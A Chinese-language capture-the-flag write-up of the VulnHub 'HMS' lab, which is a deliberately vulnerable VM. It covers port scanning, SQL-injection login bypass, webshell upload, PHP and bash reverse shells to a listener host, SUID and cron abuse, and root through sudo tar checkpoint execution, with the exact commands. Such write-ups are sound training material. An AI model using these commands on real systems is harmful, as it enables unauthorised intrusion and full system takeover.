https://download.vulnhub.com/hms/niveK.ovahttp://niveK靶场1.下载靶场,打开virtual box导入靶场,网络改为桥接模式,打开虚拟机。
2.nmap先来扫描一下端口:
nmap 192.168.0.17 -p-扫描出7080为web端口,浏览器打开发现登录页面:
抓包一下,看到登录页面有sql注入漏洞:
既然存在sql注入,那么就试了一下万能登录,登录成功,进入了后台:
进入后台寻找注入和上传点,另外扫描器找到了一个文件目录,那么只要找到上传方法就可以来写入webshell了,另外sqlmap试了一下,虽然有注入,但是用户名和密码都是加密的,没办法。 靶场使用lamp搭建的。
找到了setting.php这个文件上传点:
上传webshell:
连接一下:
连接成功,看了一眼login.php:
使用php-reverse-shell.php进行反弹,上传到文件目录之后,访问一下就可以反弹nc,这样非常方便,如果用命令行反弹,容易出错:
python -c "import pty;pty.spawn('/bin/bash')"第一个flag在home的当前目录:
使用python提升一下命令行,查找一下SUID文件:
python -c "import pty;pty.spawn('/bin/bash')"find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
/usr/bin/bash -p
现在是登录到eren用户:
cat /etc/crontab可以用crontab反弹另一个webshell,通过crontab文件:
bash -c代表从字符串读入命令:
echo "bash -c \"bash -i >& /dev/tcp/192.168.0.16/4556 0>&1\" " >> /home/eren/backup.shnc -lvvp 4556需要等一会才可以反弹成功,这个一个定时执行的命令:
sudo -l用tar命令提权:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash